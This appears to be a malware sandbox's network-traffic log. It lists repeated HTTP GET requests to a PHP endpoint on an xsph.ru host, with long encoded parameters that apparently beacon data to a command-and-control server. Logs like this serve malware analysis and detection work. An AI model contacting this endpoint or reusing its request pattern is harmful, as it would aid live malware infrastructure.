mV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSx0kaNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?m8gxGXCVv2=scSV9HzuSwMCjdTswbhT&RDrNbKAEY3sTBn6jEsDoIMfa=7UwoQ3Nj2bYlHh7zq43dti0XJstdpl&38d296bf10b75f50288ff78c7ce8263b=886958ac912bd532dd3d39de1ccac832&a67d1e031b8c1e808a6c381772ce6495=QZ1QWO5EWZzMTMlJGM2MDMhZjZ1EjY1ImM1gTOxMTM2kDZkBzNygTM&m8gxGXCVv2=scSV9HzuSwMCjdTswbhT&RDrNbKAEY3sTBn6jEsDoIMfa=7UwoQ3Nj2bYlHh7zq43dti0XJstdpl HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&c0fb3202b93362b1726aed31ca126308=0VfiIiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIwQTMkJzYmNzM4UDZ5YWO3ETZwMjM0Q2M2EGO5kzM2kjNmRzYzYDO1IiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&b19debc3db097a2b331de9c72156aebb=0VfiAjRaxmUuNGaSNzYnRzVh5mVIJWUCNFTnFkaNZTQE5kNVRVTnVlaNdXS6xEMBpHT5VkeXJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIwQTMkJzYmNzM4UDZ5YWO3ETZwMjM0Q2M2EGO5kzM2kjNmRzYzYDO1IiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&c0fb3202b93362b1726aed31ca126308=0VfiIiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiImNjNwgDZyEDMwkjYjVDN4ETNyITM4EGNlRWY4EWM1ADMjFjMzIjM2IiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=0VfiIiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMisHL9JSOWp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&b19debc3db097a2b331de9c72156aebb=QX9JSOKNlWwY0RadnVGh1YWdkYuljMi5GeGhFcZR0T0g2QJpnVHJGcaVUS0ZUbj5WOtNWU4ZEW200aJZTSDFGMGdUVpdXaJVHZzIWd01mYWpUaPl2ZHRGaCZkW5ljMZpHbHJVa3lWSp9maJ9mUYlVUxcVW5R2VaNnVHZVa3lWSp9maJpnQINmQxcVWsJ1MVl2dplUdkNjY1RXbiZlSp9UaRV1U5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPlWSYpleWZlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJlnW1Z0RURnRXpFMOxWSzlUaiNTOtJmc1clVp9maJ9mUYlVUxcVWsJ1MVl2dplEaapWWoFzQNRTWq5kMRRUTpRnbMljQE10dBRUT3FERNVXRqx0d0MUT3oUaPlWTYpVd5cUY3lTbjpGbXRVa3lWSp9maJpXMXllaKdlWYp0QMlGNHhVe4ZVTaZURUFlTWNVR4ZEW1dnRYNGeslkNJl3Y1Z1ValnTyUVa3lWS1R2MiVHdtJmVKl2TpFkVT9kRFRVa3lWSDRWRJBTSp9UawUVUTp0